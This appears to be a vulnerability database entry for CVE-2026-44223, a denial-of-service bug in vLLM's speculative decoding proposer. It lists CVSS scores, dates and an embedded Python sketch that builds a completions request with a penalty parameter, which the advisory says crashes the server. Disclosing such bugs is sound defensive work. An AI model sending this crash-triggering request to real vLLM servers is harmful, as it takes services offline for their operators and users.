| ID |
CVE-2026-44223
|
| Summary |
vLLM is an inference and serving engine for large language models (LLMs). In versions prior to 0.20.0, the extract_hidden_states speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a RuntimeError that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (repetition_penalty, frequency_penalty, or presence_penalty). A single request with a penalty parameter (e.g., "repetition_penalty": 1.1) is sufficient to crash the server. This vulnerability is fixed in version 0.20.0. |
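As a minimal sketch, the kind of request body the advisory describes could look like the following. Assumptions: a vLLM OpenAI-compatible completions endpoint, a placeholder model name, and a vulnerable version (< 0.20.0) with the extract_hidden_states speculative decoding proposer enabled; this only constructs the JSON payload and does not send it.

```python
import json

# Hypothetical payload for POST /v1/completions on a vLLM server.
# Per the advisory, a single request carrying any sampling penalty
# parameter is enough to crash the EngineCore process on affected
# versions after the first decode step.
payload = {
    "model": "example-model",       # placeholder model name (assumption)
    "prompt": "Hello",
    "max_tokens": 8,
    # Any one of repetition_penalty, frequency_penalty, or
    # presence_penalty triggers the bug on vulnerable versions.
    "repetition_penalty": 1.1,
}

body = json.dumps(payload)
print(body)
```

Sending this body to a live, vulnerable server (e.g., with curl or urllib) is omitted here, since doing so would crash the engine; on 0.20.0 and later the request is handled normally.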
| Reference |
|
| CVSS |
| Base: | 6.5 |
| Impact: | 3.6 |
| Exploitability: | 2.8 |
|
| Access |
| Vector | Complexity | Authentication |
| NETWORK | LOW | LOW |
|
| Impact |
| Confidentiality | Integrity | Availability |
| NONE | NONE | HIGH |
|
| CVSS vector |
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H |
| Last major update |
13-05-2026 - 18:16 |
| Published |
12-05-2026 - 20:16 |